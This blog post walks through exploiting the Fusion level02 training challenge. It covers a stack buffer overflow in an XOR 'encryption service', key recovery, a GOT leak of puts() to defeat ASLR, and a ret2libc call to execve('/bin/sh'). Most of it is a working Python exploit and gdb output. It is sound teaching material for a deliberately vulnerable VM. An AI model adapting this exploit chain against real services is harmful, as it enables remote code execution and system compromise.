Wednesday, August 17, 2016

Exploit Exercises Fusion Level 02 Writeup

In this first post, we're going to exploit level 02 of Fusion from exploit-exercises.com. We will see how to leverage a buffer overflow vulnerability to find our way to the much-desired shell. If you haven't already, download the Fusion live CD ISO image and boot it with VirtualBox or any other virtualization software you have.

First of all, let's see the source code of the challenge, and point out a few important things.



#include "../common/common.c"    

#define XORSZ 32

void cipher(unsigned char *blah, size_t len)
{
  static int keyed;
  static unsigned int keybuf[XORSZ];

  int blocks;
  unsigned int *blahi, j;

  if(keyed == 0) {
      int fd;
      fd = open("/dev/urandom", O_RDONLY);
      if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf)) exit(EXIT_FAILURE);
      close(fd);
      keyed = 1;
  }

  blahi = (unsigned int *)(blah);
  blocks = (len / 4);
  if(len & 3) blocks += 1;

  for(j = 0; j < blocks; j++) {
      blahi[j] ^= keybuf[j % XORSZ];
  }
}

void encrypt_file()
{
  // http://thedailywtf.com/Articles/Extensible-XML.aspx
  // maybe make bigger for inevitable xml-in-xml-in-xml ?
  unsigned char buffer[32 * 4096];

  unsigned char op;
  size_t sz;
  int loop;

  printf("[-- Enterprise configuration file encryption service --]\n");
  
  loop = 1;
  while(loop) {
      nread(0, &op, sizeof(op));
      switch(op) {
          case 'E':
              nread(0, &sz, sizeof(sz));
              nread(0, buffer, sz);
              cipher(buffer, sz);
              printf("[-- encryption complete. please mention "
              "474bd3ad-c65b-47ab-b041-602047ab8792 to support "
              "staff to retrieve your file --]\n");
              nwrite(1, &sz, sizeof(sz));
              nwrite(1, buffer, sz);
              break;
          case 'Q':
              loop = 0;
              break;
          default:
              exit(EXIT_FAILURE);
      }
  }
      
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);
  set_io(fd);

  encrypt_file();
}



A Short Walkthrough


Let's start by looking at main(). It serves on a specific port and, upon receiving a connection, calls encrypt_file(). The binary for this level (as with all other levels) is located at /opt/fusion/bin/level02. Normally all levels follow a pattern: level01 listens on port 20001, level02 listens on port 20002, but for the tutorial's sake, let's check which port it is listening on:

fusion@fusion:~$ sudo lsof -i | grep level02
...
level02   1471    20002    3u  IPv4  12112      0t0  TCP *:20002 (LISTEN)


As we can see, it is indeed listening on port 20002. Let's now take a look at encrypt_file(). It is the landing function when we connect to the host. Basically, the function runs a loop which first reads a single char, which can be either 'E' or 'Q'. 'Q' makes the function return, while 'E' is used to encrypt our data with the key the server has generated. Any other value makes the server exit.

If we choose to encrypt data, the server requires that we send an integer (a size_t, 4 bytes on this 32-bit target) which is equal to the length of the plaintext, followed by the plaintext itself. nread() is used to read data from us, with the first parameter being 0, which stands for STDIN, the second parameter being the place where to store the value being read, and the third parameter being the size of the data to read. After the data is encrypted, the server writes back to us in a similar fashion: the size of the encrypted data, followed by the data itself. nwrite() is used to write data back to us, with the only difference being that the first parameter is now 1, which stands for STDOUT. Then the loop restarts.
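
To make the wire format concrete, here is a minimal sketch of one request and one reply as raw bytes. It is written for Python 3 (where socket data is bytes) and assumes the 4-byte little-endian size_t of a 32-bit x86 target. The helper names build_encrypt_request() and parse_encrypt_reply() are made up for this illustration and are not part of the challenge.

```python
import struct

def build_encrypt_request(data):
    """Frame one 'E' request: opcode, 4-byte little-endian length, payload."""
    return b'E' + struct.pack('<I', len(data)) + data

def parse_encrypt_reply(reply, banner_len):
    """Split a reply into (size, body), skipping the fixed-length status banner."""
    (size,) = struct.unpack('<I', reply[banner_len:banner_len + 4])
    body = reply[banner_len + 4:banner_len + 4 + size]
    return size, body

request = build_encrypt_request(b'test')
print(request)  # b'E\x04\x00\x00\x00test'
```

Note that the length field is entirely under the client's control, which matters for what follows.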

The only function we haven't yet seen is cipher(). The cipher() function may seem a little daunting at first, but all it really does is XOR our data with a randomly generated key. Moreover, the key doesn't change for the lifetime of the connection. The key is of type unsigned int[32], i.e. 128 bytes long. The data is XORed one 4-byte word at a time, and the key repeats every 128 bytes.
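
For readers who prefer Python to C, the following is a rough model of cipher(), not the server's actual code. It is written for Python 3 and assumes little-endian 32-bit words; the key is passed in explicitly rather than kept in a static variable. As in the C version, a partial trailing word is XORed in full, so the bytearray must be at least as long as the length rounded up to a multiple of 4.

```python
import os
import struct

XORSZ = 32  # number of 32-bit key words, as in the C source

def cipher(buf, length, keybuf):
    """XOR `length` bytes of bytearray `buf` in place, one 32-bit word at a time."""
    blocks = length // 4
    if length & 3:
        blocks += 1  # a partial trailing word is still XORed in full
    for j in range(blocks):
        (word,) = struct.unpack_from('<I', buf, j * 4)
        struct.pack_into('<I', buf, j * 4, word ^ keybuf[j % XORSZ])

# A random 128-byte key, standing in for the read from /dev/urandom.
keybuf = list(struct.unpack('<32I', os.urandom(XORSZ * 4)))

buf = bytearray(b'hello world!')  # 12 bytes, i.e. three whole words
cipher(buf, len(buf), keybuf)     # encrypt
cipher(buf, len(buf), keybuf)     # applying the same key again restores the input
```

Running cipher() twice with the same key returns the original bytes, which is the property the rest of the exploit relies on.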

Time to talk about the fun part: the vulnerability.  But, by now, you must've spotted the vulnerability. If not, please do not continue reading until you find out where the vulnerability is.

So, as you have already noticed (you did follow my advice, didn't you?), the vulnerability is that buffer has a size of 131072 bytes (32 * 4096), but nread() reads as many bytes as the sz value we send and never checks it against the size of the buffer, thus allowing us to overflow the buffer as we please.



Getting Control of EIP


We have reviewed the source code of the vulnerable program, and we also showed why the program was vulnerable. Now we are going to exploit this vulnerability, by first doing the simplest thing you can do to a vulnerable program: crash it. To do this, we are going to overwrite the return address of the encrypt_file() function with an invalid address. However, we have just a minor obstacle in front of us.

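Sure enough, sending a sufficiently large plaintext to encrypt will crash the server. However, the server XORs whatever we send with its key before the function returns, so the bytes that end up on the stack are not the ones we sent. Since we want to alter the server's state in a meaningful way, we need to take the encryption into account.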

Let's just lay a little bit of foundation for the exploit we will be writing. 


import socket
from struct import pack, unpack
import telnetlib

def connect(host='localhost', port=20002):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s


def consume_welcome_message(fd):
    welcome_message = "[-- Enterprise configuration file encryption service --]\n"
    
    # return the message if needed for debugging purposes
    return fd.read(len(welcome_message))

def send_quit(fd):
    fd.write('Q')

def encrypt_data(fd, data):
    """this function sends data for encryption to the server. returns the encrypted data"""
    fd.write('E' + pack('<I', len(data)) + data) 
    success_message = "[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\n"
    fd.read(len(success_message)) # ignore the encryption complete message
    encrypted_data_len, = unpack('<I', fd.read(4))
    return fd.read(encrypted_data_len)

def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    encrypted_test = encrypt_data(sock_fd, 'test data to encrypt')

if __name__ == '__main__':
    main()


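We wrote a set of functions which will help us develop the exploit later on. We wrap the socket in a file object (via makefile()) instead of using the socket directly, in order to avoid calling recv() repeatedly when trying to read fixed-length data: recv() may return fewer bytes than requested, while read(n) on the file object keeps reading until it has n bytes or the connection closes.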
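
For comparison, this is roughly what reading fixed-length data looks like with the raw socket. It is a sketch for Python 3, and recv_exact() is a hypothetical helper name, not something the exploit uses. The demonstration runs against a local socket pair, so no server is needed.

```python
import socket

def recv_exact(sock, n):
    """Read exactly n bytes from sock, looping because recv() may return fewer."""
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:
            raise EOFError('connection closed with %d bytes missing' % remaining)
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)

# Local demonstration with a connected socket pair.
a, b = socket.socketpair()
a.sendall(b'hello ')
a.sendall(b'world')
data = recv_exact(b, 11)
a.close()
b.close()
```

With a 128 KB payload coming back from the server in many TCP segments, this kind of loop would be needed on every read, which is why the file object is convenient.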


Retrieving the Encryption Key


I know it is beginning to look like a really long journey, but believe me, we will soon get to the fun part. Now let's dive a little bit deeper into what happens when we send the data to encrypt to the server. Right after the server receives the data, a call to cipher() follows. By carefully inspecting cipher(), we can deduce that the function encrypts the buffer in place, then the same buffer is sent back to us. Also, remember that as long as we keep the same connection to the server, the encryption key will remain the same. 

XOR encryption is a very simple scheme. The way it works makes it really easy to retrieve the original key if we have both the plaintext and the ciphertext: XORing the two together yields the key. Since we already have the plaintext, and we also get the ciphertext back when encrypting the data, we can easily retrieve the key. Let's now write the methods necessary to perform XOR encryption and to retrieve the key.



def xor(value, key):
    # isn't python a joy?
    return ''.join([chr(ord(e) ^ ord(key[i % len(key)])) for i, e in enumerate(value)])

def retrieve_key(fd):
    dummy_data = 'A' * 128
    return xor(dummy_data, encrypt_data(fd, dummy_data))


There we have it. We wrote our xor encryption routine, and also a method to retrieve the encryption key. 
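
The recovery can be checked offline without touching the server. The sketch below is a Python 3 variant of xor() operating on bytes; server_key is a locally generated stand-in for the secret key, purely an assumption for the demonstration.

```python
import os

def xor(value, key):
    """XOR bytes `value` with `key`, repeating the key as needed."""
    return bytes(v ^ key[i % len(key)] for i, v in enumerate(value))

server_key = os.urandom(128)                    # stands in for the server's keybuf
known_plaintext = b'A' * 128                    # what we choose to send
ciphertext = xor(known_plaintext, server_key)   # what the server would send back
recovered_key = xor(known_plaintext, ciphertext)
```

The known plaintext has to be at least 128 bytes long. A shorter one would only reveal the first part of the key.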



Back to Owning EIP


Alright, we can now retrieve the encryption key with which the server is encrypting the data we send. As hinted above, XOR has a very nice property:

If A xor B = C, then A xor C = B, and also B xor C = A.

So if we encrypt the encrypted data, we get back the original plaintext. Get it? If we encrypt the data before sending it, the cipher() function will actually decrypt the data, effectively leaving our original data in memory.
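
Here is a small offline check of that idea for a payload longer than the key, written for Python 3. The variable names and the sample payload are illustrative assumptions. The key is applied from the first byte of the buffer, so the padding and the interesting bytes must be XORed together as one string for the key positions to line up.

```python
import os

def xor(value, key):
    """XOR bytes `value` with `key`, repeating the key as needed."""
    return bytes(v ^ key[i % len(key)] for i, v in enumerate(value))

key = os.urandom(128)                       # stand-in for the recovered key
wanted = b'A' * 300 + b'\xef\xbe\xad\xde'   # what should end up in server memory
sent = xor(wanted, key)                     # what we put on the wire
in_memory = xor(sent, key)                  # what the server's cipher() leaves behind
```

A side effect is that the "encrypted" data the server echoes back is our original plaintext.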

So now we are free to own the EIP as we wish. We know that the buffer's size is 131072 bytes. So we need to add a few more bytes in order to enjoy our first victory.

Let's write a method to do just that.



def crash_server(fd, key, bufsize=131072):
    junk = 'A' * bufsize # this will fill the buffer completely
    overwrite = 'AAAABBBBCCCCDDDDEEEEFFFF'
    data = xor(junk + overwrite, key)
    encrypt_data(fd, data)
    send_quit(fd)

# let's change our main method
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    crash_server(sock_fd, key)

So we wrote the crash_server() method, which takes the socket file descriptor and the encryption key, and sends a payload which should crash the server by setting EIP to a bogus address. We first send the data by calling the encrypt_data() method, then we send 'Q' to make the encrypt_file() function in the server return to our overwritten address. Let's see if 24 bytes are enough to overwrite the return address.

So, we run the script, and...well, nothing. We need to check the logs:

fusion@fusion:~$ dmesg | tail
[...]

[104449.594025] level02[11212]: segfault at 45454545 ip 45454545 sp bfd93020 error 14

Oh boy...it looks like the server crashed at EIP 0x45454545. If your ASCII is a little bit rusty, you can verify that 0x45 (or 69 decimal) is the character E. Since EEEE sits 16 bytes into our overwrite string, we can deduce that the saved return address starts 16 bytes beyond the end of the buffer.
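
The same deduction can be done mechanically, which helps with longer patterns. A minimal Python 3 sketch, using the overwrite string from crash_server() and the faulting address from the log:

```python
import struct

pattern = b'AAAABBBBCCCCDDDDEEEEFFFF'
fault_address = 0x45454545  # the ip value reported by dmesg

# x86 is little-endian, so pack the address the way it sits in memory.
needle = struct.pack('<I', fault_address)
offset = pattern.find(needle)
print(offset)  # 16
```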



An Arbitrary Read Primitive


So far we have taken control of EIP, meaning we can redirect execution to any address we wish. But we have two protections to defeat: NX and ASLR. They work very well in conjunction, but the moment we beat ASLR, NX becomes pretty weak, because we can simply return into code that is already mapped as executable. We now get to the harder (and more fun) part of exploitation. In order to beat ASLR, we either have to bruteforce it (yuck!), or find a way to leak a memory address which will then be used to find out other addresses of interest. The latter is what we are going to do now.

In order to leak information from memory, we need a way to get that data to us. I hear what you are saying...the answer is nwrite(). This function reads from a specific address, and writes that data to us via the socket connection. But, what to read? Before we move on to read from an actually useful address, we are going to read the string "Enterprise" from the server, to make sure that things are working.

In order to setup the exploit, we first need a few things. Let's load the level02 binary in gdb and find the address of nwrite() and the address of the "Enterprise" string.

fusion@fusion:~$ gdb /opt/fusion/bin/level02
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /opt/fusion/bin/level02...done.
(gdb) p &nwrite

$1 = (ssize_t (*)(int, void *, size_t)) 0x80495a0 <nwrite>

So we can see that nwrite() resides in address 0x80495a0. Now we need to find the address of the string "Enterprise". We know that the function encrypt_file() prints the welcome message when first called. So let's disassemble that function and see what we can find.

(gdb) disas encrypt_file
Dump of assembler code for function encrypt_file:
   0x080497f7 <+0>:     push   %ebp
   0x080497f8 <+1>:     mov    %esp,%ebp
   0x080497fa <+3>:     sub    $0x20028,%esp
   0x08049800 <+9>:     movl   $0x8049e04,(%esp)
   0x08049807 <+16>:    call   0x8048930 <puts@plt>

Just at the top of the function, we can see a call to puts(). The source code shows that the code actually calls printf(), but maybe the compiler has optimized it to use puts() since it contains just a simple string and no formatting. So we have no choice but to see what is the value in the only parameter that is passed to puts(), that is 0x8049e04.

(gdb) p (char*) 0x8049e04

$3 = 0x8049e04 "[-- Enterprise configuration file encryption service --]"

And sure enough, there is our warm welcoming message. So our welcoming message is at address 0x8049e04, but we want to get only the string "Enterprise", not the whole string. So the address we need is 0x8049e04 + 4, to skip the first 4 characters, which gives us 0x8049e08.
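
The arithmetic is trivial, but spelling it out guards against off-by-one mistakes. A tiny Python sketch using the address gdb printed:

```python
banner = "[-- Enterprise configuration file encryption service --]"
banner_addr = 0x8049e04  # address of the banner, from gdb

word = "Enterprise"
param_addr = banner_addr + banner.index(word)  # skip the leading "[-- "
param_size = len(word)
print(hex(param_addr), param_size)  # 0x8049e08 10
```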

So we know the address of the function we are going to call and the address of the data we are going to read (and its size). Now we are missing only one piece of the puzzle: how? To answer that question, we need to take a look at how the stack is laid out when we crash the server with the proof-of-concept code we wrote above, where we overwrote the return address with 0x45454545.

As we found out previously, there was a gap of 16 bytes between the buffer and the saved return address. So the stack looked something like below: (hint: you can verify by attaching gdb to the running process)

 ----------------------
|    return address    |
 ----------------------
|   saved ebp address  |
 ----------------------
|   unknown (4 bytes)  |
 ----------------------
|   unknown (4 bytes)  |
 ----------------------
|   unknown (4 bytes)  |
 ----------------------
| buffer (131072 bytes)|
 ----------------------

Then, after sending the data to encrypt (which overflowed), the stack became like below:

 ----------------------
|      0x45454545      | <-- EEEE
 ----------------------
|      0x44444444      | <-- DDDD
 ----------------------
|      0x43434343      | <-- CCCC
 ----------------------
|      0x42424242      | <-- BBBB
 ----------------------
|      0x41414141      | <-- AAAA
 ----------------------
| buffer (131072 bytes)| <-- filled with A's
 ----------------------

So far so good. We know that we need to replace the return address with the address of nwrite(). How about its parameters? Well, it makes sense to discuss a little bit how a function is called in ASM by using nwrite() as an example. Normally we would push the arguments first, starting from the rightmost argument to the first, and then call the function. Here's how it would be in code:


push $10        ; push the length of the string (3rd argument)
push $0x8049e08 ; push the address of the string Enterprise (2nd argument)
push $1         ; push STDOUT (1st argument)
call 0x80495a0  ; call nwrite


Moreover the call instruction could also be written as:


push return_address ; address nwrite will return to, when done
jmp 0x80495a0       ; jump to nwrite to execute the function


So, in order to execute the nwrite() function, we need to write 4 values after overwriting the return address, in the reverse order in which they are pushed to the stack in the code snippet above. Armed with this information, let's change our Python script so that it tries to read the string we want.


def test_arbitrary_read(fd, key, param_addr, param_size):
    junk_len = 131072 + 16
    nwrite_address = 0x80495a0
    nwrite_return = 0xdeadbeef
    param_stdout = 1
    payload = junk_len * 'A'
    payload += pack('<I', nwrite_address)
    payload += pack('<I', nwrite_return)
    payload += pack('<I', param_stdout)
    payload += pack('<I', param_addr)
    payload += pack('<I', param_size)
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # trigger the exploit
    print fd.read(10) # must print Enterprise

# let's change main
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    test_arbitrary_read(sock_fd, key, 0x8049e08, 10) # read 10 bytes from 0x8049e08 and print them

Alright, we have our code all set up. We do the usual connect() call, followed by the method that consumes the welcome message, next we retrieve the key, and we finally call our arbitrary read method. Since we have decided that nwrite() will return to 0xdeadbeef, it means that we should also check the logs to see if the server will crash at that address or not. Now let's run it.

fusion@fusion:~$ ./exploit.py
Enterprise

Nice! It seems we were able to read that sought after "Enterprise" string. Let's also inspect the logs to see if there is any crash:

fusion@fusion:~$ dmesg | tail
[...]
[173049.114112] level02[16997]: segfault at deadbeef ip deadbeef sp bfd93024 error 15

As expected, we have our controlled demolition right there, at 0xdeadbeef, as promised.
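
The five pack() calls in test_arbitrary_read() follow a pattern that will come up again: function address, return address, then the arguments in order. It could be factored into a small helper. This is only a sketch for Python 3, assuming 32-bit little-endian cdecl as on this target; build_call_frame() is a name invented here.

```python
import struct

def build_call_frame(func_addr, return_addr, *args):
    """Lay out a 32-bit cdecl call as it must appear on the stack:
    the function to return into, where it returns afterwards, then its arguments."""
    words = (func_addr, return_addr) + args
    return struct.pack('<%dI' % len(words), *words)

# nwrite(1, 0x8049e08, 10), returning to 0xdeadbeef afterwards
frame = build_call_frame(0x80495a0, 0xdeadbeef, 1, 0x8049e08, 10)
```

The result is appended to the 131072 + 16 bytes of padding, and the whole payload is XORed with the key before sending.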


In GOT We Trust


We now have an arbitrary read primitive, which we can use to leak an address. This is such a great victory. The next step is also an important step, which relies on our ability to read arbitrarily from the memory of the victim process. Our plan is as follows:
  1. Leak the address of a function from libc and use this address to compute the ASLR offset.
  2. Use the address above to deduce the address of execve(), and the address of the string "/bin/sh".
  3. Construct the shell payload.
  4. Profit!
We're at step 1 right now, so we need to determine the function whose address we are going to leak. Before we get to that, let's give a brief overview of how the program finds the addresses of libc functions. Basically, there is something called the Global Offset Table (GOT), which serves as a list of addresses. Each entry in this table is a fixed location where the address of a certain libc function will be stored at runtime. It's as if the GOT were telling us that the address of printf() at runtime will be stored at 0xc0debabe. So if we were to read what is stored at 0xc0debabe at runtime, we would find another address, say 0xaabbccdd, and 0xaabbccdd would be the address of printf() at runtime. We can use the objdump tool to view the GOT entry for a function:

fusion@fusion:~$ objdump -R /opt/fusion/bin/level02

/opt/fusion/bin/level02:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
0804b368 R_386_GLOB_DAT    __gmon_start__
0804b420 R_386_COPY        __environ
0804b424 R_386_COPY        stderr
0804b428 R_386_COPY        stdin
0804b440 R_386_COPY        stdout
0804b378 R_386_JUMP_SLOT   setsockopt
0804b37c R_386_JUMP_SLOT   dup2
0804b380 R_386_JUMP_SLOT   setresuid
0804b384 R_386_JUMP_SLOT   read
0804b388 R_386_JUMP_SLOT   printf
[...] other entries follow

So, at runtime, 0x804b388 will contain the address to printf(). But it doesn't end here. The value will be populated with the correct printf() address only after it has been called for the first time. For that reason, we also have PLT, the Procedure Linkage Table. The program works directly with the PLT. So if our program wants to call printf(), it will actually call a small stub called printf@plt(). If we try to disassemble the printf() function in gdb, we will end up disassembling this stub. Let's give it a try:

(gdb) disas printf
Dump of assembler code for function printf@plt:
   0x08048870 <+0>:     jmp    *0x804b388
   0x08048876 <+6>:     push   $0x20
   0x0804887b <+11>:    jmp    0x8048820
End of assembler dump.

It looks like the stub doesn't do much. The first line of the stub jumps to the address stored in 0x804b388. That looks like the GOT entry for printf(). Let's inspect that address with gdb:

(gdb) x *0x804b388
0x8048876 <printf@plt+6>:       0x00002068

So 0x804b388, which is the GOT entry for printf(), actually contains 0x8048876, which is the second instruction in the printf@plt() stub. The two other instructions of the stub basically call the resolver, which resolves the real address of printf() and also updates its GOT entry, so that the next time it is accessed it will hold the address of the printf() function.
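
This gives a simple test for whether a value read from a GOT slot is useful: if it still equals the stub address plus 6 (the length of the first jmp instruction in the disassembly above), the function has not been resolved yet. The check below is a sketch in Python; the helper name is invented, and the second call uses the puts@plt address seen earlier together with a made-up libc-looking value purely as an illustration of a resolved entry.

```python
PLT_FIRST_INSN_LEN = 6  # size of the `jmp *GOT` instruction in the stub

def got_entry_is_unresolved(got_value, plt_stub_addr):
    """True if the GOT slot still points back into its own PLT stub."""
    return got_value == plt_stub_addr + PLT_FIRST_INSN_LEN

# printf: the GOT holds 0x8048876 and the stub starts at 0x08048870
print(got_entry_is_unresolved(0x8048876, 0x08048870))  # True
# an entry holding an address far outside the binary has been resolved
print(got_entry_is_unresolved(0xb7600000, 0x08048930))  # False
```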

This information was provided so that we know what to look for, and why. Specifically, we are looking for a function which we are 100% certain will have been called at least once, so that the address we leak from its GOT entry is the real address of the function. For this reason, we will choose the function puts(). If you remember, we showed above that puts() is called instead of printf() when we disassembled the first instructions of the encrypt_file() function, so it has already run by the time we can send anything. Now we need the GOT entry address for puts(). We can find it by using objdump:

fusion@fusion:~$ objdump -R /opt/fusion/bin/level02 | grep puts
0804b3b8 R_386_JUMP_SLOT   puts

So, in order to leak the address of puts() at runtime, we need to read the 4-byte value stored at 0x804b3b8.

Digging Our Way Towards the Shell


We theoretically solved the first step in our checklist (introduced in the section above), and we are now very close to getting to the shell. Let's first find out the addresses of execve() and "/bin/sh" relative to puts().

fusion@fusion:~$ ps -ef | grep level02
20002     1471     1  0 Aug15 ?        00:00:00 /opt/fusion/bin/level02
fusion   18773  2023  0 23:28 pts/1    00:00:00 grep --color=auto level02
fusion@fusion:~$ sudo gdb /opt/fusion/bin/level02 --pid=1471
[sudo] password for fusion:
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
[...]
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb7730424 in __kernel_vsyscall ()
(gdb) find &system, &system+100000000, "/bin/sh"
0xb76e08da
warning: Unable to access target memory at 0xb7722f62, halting search.
1 pattern found.
(gdb) find &system, &system+10000000, "/bin/sh"
0xb76e08da
warning: Unable to access target memory at 0xb7722f62, halting search.
1 pattern found.
(gdb) x &puts
0xb76083b0 <_IO_puts>:  0x8920ec83
(gdb) x &execve
0xb7643910 <__execve>:  0x8908ec83

So we first found the pid for level02, we attached gdb to the process, and now we will use the addresses we found to compute the offset from puts() for execve() and "/bin/sh".

execve_offset = 0xb7643910 - 0xb76083b0
binsh_offset = 0xb76e08da - 0xb76083b0
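
To see how these offsets are meant to be used, here is a small Python 3 sketch that rebases both targets onto a leaked puts() address. The reference values are the ones from the gdb session above and are specific to this particular libc build. The 0x15000 slide and the resolve() helper are invented for the example.

```python
import struct

# Reference addresses observed in one gdb session (they change on every run).
REF_PUTS = 0xb76083b0
REF_EXECVE = 0xb7643910
REF_BINSH = 0xb76e08da

def resolve(leaked_puts):
    """Rebase execve() and "/bin/sh" onto a puts() address leaked at runtime."""
    execve_addr = leaked_puts + (REF_EXECVE - REF_PUTS)
    binsh_addr = leaked_puts + (REF_BINSH - REF_PUTS)
    return execve_addr, binsh_addr

# Pretend a later run slid libc by 0x15000 and the leak returned these 4 bytes.
leak = struct.pack('<I', REF_PUTS + 0x15000)
(leaked_puts,) = struct.unpack('<I', leak)
execve_addr, binsh_addr = resolve(leaked_puts)
print(hex(execve_addr), hex(binsh_addr))
```

ASLR moves libc as a whole, so the distances between symbols stay constant even though the absolute addresses do not.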

We will use these offsets in our exploit payload. Now the plan is to first leak the address of puts(), then redirect execution from nwrite() to encrypt_file() again. We will overflow the buffer in encrypt_file() again, this time issuing a call to execve("/bin/sh", NULL, NULL) and thus launching the shell. Let's waste no time and write ourselves an exploit:


def exploit(fd, key):
    junk_len = 131072 + 16
    nwrite_address = 0x80495a0
    encrypt_file = 0x080497f7 # address of encrypt_file() we got from gdb
                              # in the arbitrary read primitive section
    puts_got_entry = 0x804b3b8 
    param_stdout = 1
    payload = junk_len * 'A'
    payload += pack('<I', nwrite_address)
    payload += pack('<I', encrypt_file)
    payload += pack('<I', param_stdout)
    payload += pack('<I', puts_got_entry)
    payload += pack('<I', 4) # 4 = size of address
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # trigger the exploit
    
    puts_address, = unpack('<I', fd.read(4))
    
    consume_welcome_message(fd) # welcome message is printed again
    
    execve_offset = 0xb7643910 - 0xb76083b0
    binsh_offset = 0xb76e08da - 0xb76083b0
    
    payload = junk_len * 'A'
    payload += pack('<I', execve_offset + puts_address)
    payload += pack('<I', 0xdeadbeef)
    payload += pack('<I', binsh_offset + puts_address)
    payload += pack('<I', 0) # two NULL
    payload += pack('<I', 0) # arguments
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # spawn the shell


# now changes to our main method
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    
    # after this method call the shell will be listening for our commands
    exploit(sock_fd, key)
    
    # we use telnetlib to interact with the shell
    t = telnetlib.Telnet()
    t.sock = sock
    t.interact()

Our main method now calls the exploit method, and then we can see we use the interact() method of a Telnet object. Since the victim program's I/O is connected to the socket, and we expect to have executed the execve("/bin/sh", NULL, NULL) command, the shell should be listening for our commands from the socket. The Telnet object, given the socket, abstracts the boring stuff from us, and provides to us a simple interface to issue commands.

If everything went well, executing that script should give us a shell prompt:

fusion@fusion:~$ ./exploit.py
id

uid=20002 gid=20002 groups=20002

As we can see, after running the script, it doesn't exit. Instead, it is waiting for us to input a command. We give the command id, and we get the uid, gid and groups with a value of 20002, meaning we have successfully exploited level02 and gained shell access. Congratulations!

You can also find the exploit on GitHub. There are minor changes compared to the code in here, but the basics remain the same. 

I'd love to hear your thoughts on this.